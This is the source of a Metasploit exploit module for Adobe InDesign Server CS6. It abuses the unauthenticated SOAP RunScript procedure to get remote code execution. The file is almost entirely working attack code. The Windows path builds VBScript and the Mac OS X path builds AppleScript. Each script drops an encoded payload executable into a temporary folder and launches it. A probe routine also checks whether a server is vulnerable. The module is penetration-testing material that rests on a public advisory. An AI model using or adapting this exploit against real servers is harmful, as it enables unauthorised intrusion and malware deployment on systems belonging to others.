GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/indesign_server_soap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
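# Exploit module for the "RunScript" procedure exposed by the SOAP interface
# of Adobe InDesign Server (targets: CS6 Server on 64-bit Windows and Mac OS X).
#
# RunScript executes script text supplied by the SOAP client. The envelope
# built in #send_soap_request carries only the script text and its language,
# with no credential fields, so the only precondition visible in this file is
# network reachability of the SOAP port (RPORT defaults to 12345).
#
# Artifacts left on a target (nothing in this module removes them):
# * Windows: an executable named with eight random upper-case letters plus
#   ".exe" in the folder returned by FileSystemObject.GetSpecialFolder(2)
#   (the temporary folder), started through Wscript.Shell.
# * Mac OS X: an executable /tmp/<5-9 random letters>; the intermediate
#   /tmp/<5-9 random letters>.txt is deleted by the script itself.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Registers the module metadata, its two targets and the default RPORT.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',
        'Description' => %q{
          This module abuses the "RunScript" procedure provided by the SOAP interface of
          Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).

          The exploit drops the payload on the server and must be removed manually.
        },
        'Author' => [
          'h0ng10', # Vulnerability discovery / Metasploit module
          'juan vazquez' # MacOSX target
        ],
        'License' => MSF_LICENSE,
        'Platform' => %w{osx win},
        'Privileged' => false,
        'DisclosureDate' => '2012-11-11',
        'References' => [
          [ 'OSVDB', '87548'],
          [ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]
        ],
        'Targets' => [
          [
            'Indesign CS6 Server / Windows (64 bits)',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'win'
            }
          ],
          [
            'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'osx'
            }
          ]
        ],
        'DefaultTarget' => 0,
        # NOTE(review): the description states that the payload stays on disk,
        # which suggests ARTIFACTS_ON_DISK for 'SideEffects' - confirm before
        # replacing the placeholder values below.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([ Opt::RPORT(12345) ])
  end

  # Wraps a script in a RunScript SOAP envelope and POSTs it to "/".
  #
  # Only "&" is escaped before the script is embedded in the XML; other
  # XML-special characters in script_code are passed through unchanged.
  # The caller's string is left unmodified (the escaped text is a copy).
  #
  # @param script_code [String] script text placed in <IDSP:scriptText>
  # @param script_type [String] value placed in <IDSP:scriptLanguage>
  # @return the result of send_request_cgi; the callers in this file treat
  #   nil as "no response"
  def send_soap_request(script_code, script_type)
    escaped_script = script_code.gsub('&', '&amp;')
    soap_xml = %Q{
      <?xml version="1.0" encoding="UTF-8"?>
      <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">
        <SOAP-ENV:Body>
          <IDSP:RunScript>
            <IDSP:runScriptParameters>
              <IDSP:scriptText>#{escaped_script}</IDSP:scriptText>
              <IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>
            </IDSP:runScriptParameters>
          </IDSP:RunScript>
        </SOAP-ENV:Body>
      </SOAP-ENV:Envelope>
    }

    # 5 is send_request_cgi's second argument (the timeout, in seconds).
    send_request_cgi({
      'uri' => '/',
      'method' => 'POST',
      'content-type' => 'application/x-www-form-urlencoded',
      'data' => soap_xml,
    }, 5)
  end

  # Sends a one-line javascript that returns a random numeric marker and looks
  # for that marker in the SOAP response.
  #
  # @return Exploit::CheckCode::Vulnerable when the marker is echoed back,
  #   Exploit::CheckCode::Unknown when no response body was received,
  #   Exploit::CheckCode::Safe otherwise
  def check
    # Use a very simple javascript
    check_var = rand_text_numeric(10)
    checkscript = 'returnValue = "' + check_var + '"'

    res = send_soap_request(checkscript, "javascript")

    # Without a response there is nothing to inspect; previously this case
    # raised NoMethodError on nil instead of returning a check code.
    return Exploit::CheckCode::Unknown unless res && res.body

    expected = '<data xsi:type="xsd:string">' + check_var + '</data>'
    return Exploit::CheckCode::Vulnerable if res.body.include?(expected)

    Exploit::CheckCode::Safe
  end

  # Builds a platform-specific script around the generated payload executable,
  # submits it through RunScript and reports where the file was written so it
  # can be removed by hand.
  def exploit
    if target.name =~ /Windows/
      print_status("Creating payload vbs script")
      encoded_payload = generate_payload_exe.unpack("H*").join
      exe_file = Rex::Text.rand_text_alpha_upper(8) + ".exe"
      wsf = Rex::Text.rand_text_alpha(8)
      payload_var = Rex::Text.rand_text_alpha(8)
      exe_name_var = Rex::Text.rand_text_alpha(8)
      file_var = Rex::Text.rand_text_alpha(8)
      byte_var = Rex::Text.rand_text_alpha(8)
      shell_var = Rex::Text.rand_text_alpha(8)

      # This one creates a smaller vbs payload (without deletion)
      vbs = %Q{
        Set #{wsf} = CreateObject("Scripting.FileSystemObject")
        #{payload_var} = "#{encoded_payload}"
        #{exe_name_var} = #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"
        Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)
        For x = 1 To Len(#{payload_var})-3 Step 2
          #{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)
          #{file_var}.write Chr(#{byte_var})
        Next

        #{file_var}.write Chr(#{byte_var})
        #{file_var}.close

        Set #{shell_var} = CreateObject("Wscript.Shell")
        #{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False
        Set #{shell_var} = Nothing
        returnValue = #{exe_name_var}
      }
      print_status("Sending SOAP request")

      res = send_soap_request(vbs, "visual basic")

      # Used when the response does not reveal the full path: the script writes
      # to GetSpecialFolder(2), i.e. the temporary folder.
      fallback_location = "#{exe_file} in the server's temporary folder"
      if res && res.body
        file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]
        # Avoid an empty path in the cleanup warning when the pattern is absent.
        file_to_delete = fallback_location if file_to_delete.nil? || file_to_delete.empty?
        print_warning "Payload deployed to #{file_to_delete}, please remove manually"
      elsif !res
        print_warning "No response received; if the script ran, #{fallback_location} must be removed manually"
      end

    elsif target.name =~ /Mac OS X/

      print_status("Creating payload apple script")

      exe_payload = generate_payload_exe
      b64_exe_payload = Rex::Text.encode_base64(exe_payload)
      b64_payload_name = rand_text_alpha(rand(5) + 5)
      payload_name = rand_text_alpha(rand(5) + 5)

      apple_script = %Q{
        set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission
        write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp
        close access fp
        do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"
        do shell script "rm /tmp/#{b64_payload_name}.txt"
        do shell script "chmod +x /tmp/#{payload_name}"
        do shell script "/tmp/#{payload_name}"
        set returnValue to "/tmp/#{payload_name}"
      }

      print_status("Sending SOAP request")

      res = send_soap_request(apple_script, "applescript")

      if res && res.body
        file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]
        file_to_delete = "/tmp/#{payload_name}" if file_to_delete.nil? || file_to_delete.empty?
        print_warning "Payload deployed to #{file_to_delete}, please remove manually"
      elsif !res
        print_status "No response, it's expected"
        print_warning "Payload deployed to /tmp/#{payload_name}, please remove manually"
      end

    end
  end
end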